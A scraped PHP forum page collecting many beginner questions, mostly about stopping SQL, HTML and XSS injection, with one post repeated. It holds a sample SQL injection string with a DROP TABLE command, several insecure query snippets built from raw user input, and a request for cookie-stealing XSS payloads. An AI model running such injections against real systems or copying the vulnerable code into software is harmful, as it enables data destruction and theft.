|
PHP - My Php Script Is Letting Html Injections, How Do I Prevent It?
Here is the code that i am using to accept data and display the data.
To accept and add it in database i am using : $comment = $_POST['txtcomment']; $comment = @mysql_real_escape_string($comment); To display the data from DB i am using : $comment = $rowscomment['comment']; <?php echo nl2br($comment); ?> Please help me correct it....... I am still learning PHP. Similar TutorialsI am having problems with a search feature I am using for a website I am building. Everything was working fine when I was testing on my local machine using EasyPHP 3.0. The issue I am having is that once I uploaded the site to a "live" server and tested it, my search function wouldn't work. The issue resides in the two lines with the magic quotes and the real escape string, for some reason those lines worked fine while testing using EasyPHP 3.0, but now I must delete those lines in order for my search function to work. The problem is that deleting those lines makes me vulnerable to an SQL injection. I have tried deleting just the magic quotes line and everything works properly, but then I am not seeing any kind of strip slashing/sanitizing when I enter in a statement like this into my search: a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't. Any help on this issue would be greatly appreciated! //get data $button = $_GET['submit']; if (get_magic_quotes_gpc() == 0){ $search = mysql_real_escape_string($_GET['search']); // clean up the search string } else { $search = $_GET['search']; $limit = 9; $page = $_GET['page']; if($page) $start = ($page - 1) * $limit; I also tried using the mysql_real_escape_string on my construct, but I get syntax errors because of the | being used before and after the $search_each. That | character must remain in place in order for my search to work the way I want it to. $x++; if ($x==1) $construct .= "keywords LIKE '%".mysql_real_escape_string(|$search_each|)."%'"; else $construct .= "AND keywords LIKE '%|$search_each|%'"; } I'd like to use a text editor like this one: http://tinymce.moxiecode.com/examples/full.php for my forums. But I am not sure exactly how I would prevent abuse and injects to messed up the page, rather than being contained in the designated area it is meant for. Could some one please help me, I know htmlspecailchars will not work, since some of the code needs to render as html Hello all, A simple question: I have a HTML application from which a php script is executed. 'GET' method is used and no form is submitted. I was wondering if there is a way to prevent users from run this php script directly in the browser. Thank you all for your suggestions, Mamer Hi all, I am trying to make a emailscript with PEAR to send quite some people a personalized messaged. But i thought this could very well cause the script to time out. Now i read http://php.net/manual/en/function.set-time-limit.php, but i thought does maybe someone knows a way to prevent a time out instead of setting the time-limit to a larger amount. Some terms i saw floating around we ob_start, flush, sleep and a few others but i really never worked with these. If someone could point me in the right direction of thinking or maybe knows a tutorial or guide i really would love to hear it. Thank you! Hi guys, For a project I made sort of a custom cron database. Database has 4 columns: ID (auto increment), TaskID, DateTime, Locked. I'm running a 1 minute cron in the form of a php script. The script itself starts with a query that loads a task with 'Locked != 'Y' and DateTime < NOW( ). It then locks the task (by flagging the 'Locked' field in the db) and launches another script that finishes it. That last script deletes the task when finished from the cron database. Problem is, at certain peek hours, the system would get laggy, there'd be a bunch of tasks stacking up and it would get behind on the schedule. In order to combat that, I made an extra 1 minute cron, launching the same script. Now, my problem: mysql is too slow In principle, there shouldn't be any problem: all tasks picked up by either instance of the script would be locked so the other instance wouldn't be able to pick up the same task. The problem occurs when both instances are booted at the same time (well, one after the other but with a minuscule time difference between them) and they both at the same time run the query to get a 'free' task from the database: the system will give them both the same task before either of the script instances has the time to lock it up. I'm trying to think of some solutions but I'd like your feedback on what solution would be best. - Putting an exclusive lock on the php file is not an option for me since I still want to run the script, I just need it to pick up an exclusive task. - Other option: having the script open with a random sleep of (1, 10) seconds, it will have the script instances pick up a task at a different time, giving the other instance time to lock it up. Obvious disadvantage: I'm losing time. - Using a file as a flag. Set a directory and create a file in it. Check if this is the only file in the dir, if yes: start right away. Otherwise: go to sleep for 2 seconds (should be plenty of time to run 2 queries in the other instance). What is the fastest method of doing a directory scan though, glob()? My question: what's the fastest/best way to solve this? Thanks! My host has a limit of 100 emails per hour and this is now being reached to many times a day and some emails are not being sent due to this. Does anyone have a script or know of one that can stack emails to be sent in MySql or something and every 5 minutes send one out from the stack and then delete from the stack the ones sent. I am trying to protect my guestbook entries from injections such as html, xss, and mysql injections. My php knowledge is very little. If possible, can I have some help please with protecting my entries. I have a few bits and pieces of code to protect my guestbook from injections that I got from some tutorials that I was reading. Code: [Select] <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Author: Reality Software Website: http://www.realitysoftware.ca Note: This is a free template released under the Creative Commons Attribution 3.0 license, which means you can use it in any way you want provided you keep the link to the author intact. --> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title></title> <link href="style.css" rel="stylesheet" type="text/css" /></head> <body> <!-- header --> <div id="header"> <div id="logo"><a href="index.html">Header</a></div> <div id="menu"> <ul> <li><a href="index.html">Home</a></li> <li><a href="">Link 1</a></li> <li><a href="">Link 2</a></li> <li><a href="">Link 3</a></li> <li><a href="">Contact</a></li> <li><a href="guestbook.php">Guestbook</a></li> </ul> </div> </div> <div id="icon"><a href="twitter.com/"> <img border="0" src="http://www.000webhost.com/forum/images/twitter.png" alt="twitter" width="58px;" height="53px;" /> </a></div> <!--end header --> <!-- main --> <div id="main"> <div id="content"> <div id="text"> <h1><strong>Guestbook</strong></h1> </div> <?php $input = is_numeric($input) ? intval($input) : mysql_real_escape_string($input);function sanitizeString($string) { return htmlentities( (string) $string, ENT_COMPAT, "UTF-8" ); } $preparedStatement = $db->prepare('SELECT * FROM guestbook WHERE name = :name'); $preparedStatement->execute(array(':name' => $name)); $rows = $preparedStatement->fetchAll(); $mysql_host = "localhost"; $mysql_database = "a7560006_guest"; $mysql_user = "a7560006_host"; $mysql_password = "mypassword"; // Connect to server and select database. mysql_connect("$mysql_host", "$mysql_user", "$mysql_password") or die("cannot connect server"); mysql_select_db("$mysql_database") or die("cannot select DB"); $tbl_name="guestbook"; // Table name $name = ($_POST['name']); $comment = ($_POST['comment']); $comment = stripslashes($comment); $name = stripslashes($name); $comment = str_replace("<","<",$comment); $name = str_replace("<","<",$name); $datetime=date("M-d-Y h:i:s A"); //date time $verif_box = ($_POST['verif_box']); if(md5($verif_box).'a4xn' != $_COOKIE['tntcon']){ ?> <table width="400" border="0" align="center"> <tr><td align="center"><h4>You have not entered captcha or entered incorrect captcha!</h4></td></tr> </table> </div> <!-- footer --> <div id="footer"> <div id="left_footer">© Copyright 2011<strong> Author </strong></div> <div id="right_footer"> <!-- Please do not change or delete this link. Read the license! Thanks. :-) --> Design by <a href="http://www.realitysoftware.ca" title="Website Design">Reality Software</a> </div> </div> <!-- end footer --> </div> <!-- end main --> </body> </html> <? exit; } if(empty($name) || empty($comment)) { ?> <table width="400" border="0" align="center"> <tr><td align="center"><h3>Sorry, all fields are required!</h3></td></tr> </table> <? } else { $sql="INSERT INTO $tbl_name (name, comment, datetime) VALUES ('$name', '$comment', '$datetime')"; $result=mysql_query($sql); //check if query successful if($result) { ?> <table width="400" border="0" align="center"> <tr><td align="center"><h3>Thank you for signing my guestbook!</h3></td></tr> </table> <? echo "<meta http-equiv='Refresh' content='1; URL=viewguestbook.php'>"; // link to view guestbook page } else { echo "ERROR"; } mysql_close(); } ?> </div> <!-- footer --> <div id="footer"> <div id="left_footer">© Copyright 2011<strong> Author </strong></div> <div id="right_footer"> <!-- Please do not change or delete this link. Read the license! Thanks. :-) --> Design by <a href="http://www.realitysoftware.ca" title="Website Design">Reality Software</a> </div> </div> <!-- end footer --> </div> <!-- end main --> </body> </html> Hi everyone, I have been the victim (at least i think) of SQL injection attacks!? I believe this as my contact us db table is full of 1's. How can i stop this from happening? Here's the contact form: Code: [Select] <form method="get" action="contact-send.php"> Name:<br /> <input type="text" name="name" id="name" size="30" /><br /> Email:<br /> <input type="email" name="email" id="email" size="30" /><br /> Your Question:<br /> <textarea name="question" id="question" rows="10" cols="50"></textarea><br /> <input type="submit" name="submit" value="send" /> </form> And here's the script 'contact-send.php': Code: [Select] <?PHP session_start(); include ('php only scripts/db.php'); if(isset($_POST['submit'])){ $name = $_POST['name']; $email = $_POST['email']; $question = $_POST['question']; //your code to insert variables into db can go here or after the if statement $query = "INSERT INTO contact_us (name, email, questions) VALUES ('" .$name. "', '" .$email. "', '" .$question. "')"; $result = mysql_query($query) or die(mysql_error()); echo $name."<br/>".$email."<br/>".$question; } header( 'Location: http://www.removalspace.com/contactconf.php' ); ?> Do i have to have if(isset on EACH variable? like on name, email and question too? Hello, I have been using the preg_match() to throw out invalid form characters and then both mysql_real_escape_string() and stripslashes() to escape data variables before using them with mysql. But how about messages from a text area for example on a contact form. You cant limit the characters for the user. Is escaping variables good enough to eliminate sql injections from user input? Hi, how much bandwidth is used for 1000 downloads per day or for each download? Is it safe to have no download limits? Thanks
One more question. So I have a function with two parameters, $x and $y. Here it is. Code: [Select] function dydx($x,$y){ $equation = 2 * $x; return $equation; } Now here's the problem. I want $equation to be user defined. Easy enough, I use a post command and I get $equation to equal whatever the user inputs. The problem is that if I get input from the user, I'm not sure how to take that input and then have the function parameters work on it. Like if the user inputs "3*$x + 2*$y", i want to be able to let the parameters for the function dydx act on it. How could I go about doing this? htmlspecialchars($str, ENT_QUOTES, 'UTF-8');Using this code with UTF-8. I need someone to help craft up some smalll xss injections with this. I heard htmlspecialchars doesn't stop all xss attacks, so I'm wondering what's the most xss attack you can craft to load a simple cookie loader. (Basically, just simple javascript injection is all I'm trying to find, because people can use cookie loaders with it, and yeah, that's not good). Looking for your code to be posted, and once it is.. I'll copy it and submit it through the code I posted above and see if there is any vulnerabilities. (On my localhost server) Thanks! $str = user input. Oh, and here is the BBCODE regex that the code passes through before this function is returned on the text. $text = preg_replace( "#\[b\](.+?)\[/b\]#is", "<span class='b'>\\1</span>", $text );
$text = preg_replace( "#\[i\](.+?)\[/i\]#is", "<i>\\1</i>", $text );
$text = preg_replace( "#\[u\](.+?)\[/u\]#is", "<u>\\1</u>", $text );
$text = preg_replace( "#\[s\](.+?)\[/s\]#is", "<s>\\1</s>", $text );
//Spoiler
$text = preg_replace( "#\[right\](.+?)\[/right\]#is", "<div style='text-align:right'>$1</div>", $text );
//Beautiful Colors
$text = preg_replace( "%\[colou?r=([a-zA-Z]{3,20}|\#[0-9a-fA-F]{6}|\#[0-9a-fA-F]{3})](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );
$text = preg_replace( "%\[colou?r=(rgb\(\d{1,3}, ?\d{1,3}, ?\d{1,3}\))](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );
If anyone can craft up an XSS for this, I'd appreciate it. Because I need this to be secure.
Edited by Monkuar, 10 January 2015 - 06:33 PM. htmlspecialchars($str, ENT_QUOTES, 'UTF-8');Using this code with UTF-8. I need someone to help craft up some smalll xss injections with this. I heard htmlspecialchars doesn't stop all xss attacks, so I'm wondering what's the most xss attack you can craft to load a simple cookie loader. (Basically, just simple javascript injection is all I'm trying to find, because people can use cookie loaders with it, and yeah, that's not good). Looking for your code to be posted, and once it is.. I'll copy it and submit it through the code I posted above and see if there is any vulnerabilities. (On my localhost server) Thanks! $str = user input. Oh, and here is the BBCODE regex that the code passes through before this function is returned on the text. $text = preg_replace( "#\[b\](.+?)\[/b\]#is", "<span class='b'>\\1</span>", $text );
$text = preg_replace( "#\[i\](.+?)\[/i\]#is", "<i>\\1</i>", $text );
$text = preg_replace( "#\[u\](.+?)\[/u\]#is", "<u>\\1</u>", $text );
$text = preg_replace( "#\[s\](.+?)\[/s\]#is", "<s>\\1</s>", $text );
//Spoiler
$text = preg_replace( "#\[right\](.+?)\[/right\]#is", "<div style='text-align:right'>$1</div>", $text );
//Beautiful Colors
$text = preg_replace( "%\[colou?r=([a-zA-Z]{3,20}|\#[0-9a-fA-F]{6}|\#[0-9a-fA-F]{3})](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );
$text = preg_replace( "%\[colou?r=(rgb\(\d{1,3}, ?\d{1,3}, ?\d{1,3}\))](.+?)\[/colou?r\]%msi", '<span style="color: \\1">\\2</span>', $text );
If anyone can craft up an XSS for this, I'd appreciate it. Because I need this to be secure.
Edited by Monkuar, 10 January 2015 - 06:33 PM. Basically, I have the following code ($c2 is my connection variable): Code: [Select] $rid = $_GET['id']; $q = mysql_query("SELECT * FROM reports WHERE id = $rid", $c2) or die(mysql_error()); $report = mysql_fetch_array($q); $report is used later on to gather more information that is outputted to the user. However, if in the URL, someone were to put id=1', they would have an error message spit out to them (something along the lines of: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1), indicating a SQL Injection exploit. How would I go about fixing this, and also preventing SQL Injection? Thanks a bunch, Mark I have an index HTML form that has a JavaScript link and action = 'xyz.php' Everything works fine. I've seen PHP scripts with HTML form after the closing tag ?> and they work. Yet when I included my HTML g form after my PHP code, some of my JS stopped working. What are the protocols to combining PHP and HTML? Which should run first? When is the action run?
Hey i need help with my php script.
it need to check the database but now it only check if its not empty
but i don't know what i need to add i hope that us can help me
<?php
if ($_SERVER['REQUEST_METHOD'] == 'POST' ) {
$username = trim(htmlentities(mysql_real_escape_string($_POST['username'])));
$password = trim(htmlentities(mysql_real_escape_string($_POST['password'])));
if (!empty($username) && !empty($password)) {
$_SESSION['username'] = $username;
echo "<br/> welcome ", $username;
} else {
echo "Please enter correct username or password";
}
} else {
echo "please Login";
}
?>
<h1>Login</h1>
<form ACTION="<?php echo $loginFormAction; ?>" METHOD="POST" name="login_form">
<label>Username:<br/></label>
<input type="text" name="username"><br/>
<label>Password:<br/></label>
<input type="password" name="password"><br/>
<input type="submit" value="Login">
<a href="../register">register</a>
</form>
Hiya! I need to create a simple PDF script that will always create A4 documents. I need the content to be controlled using HTML and CSS. Where do you start in creating such a script? Any help is greatly received. hi
I am having problems trying to either include php file or execute a php script within <div with a class> which I use for a drop down menu, every bit of help much appreciated, thanks..singhy
<h2 class="hidenextdiv"><a href="#">dropdown menu1</a></h2> <div class="another dropmenuclass"> <h3>Test</h3> want to add my php working code here, have tried includes but no joy, it either breaks the dropdown menu or I am not getting the results back from the database, my script works ok, have tested it separately. <h3> </h3> <div style="clear: both;"> </div> </div> I was wondering if anyone is aware of a php script that can pull html from a external site and create a local page with all the urls and image paths rewritten to local paths. I'm trying to create a module for Drupal that does this. Any script already written that I can adapt to Drupal would be great. If no one is aware of a current script that does this, can anyone point me in the right direction? |
|||||||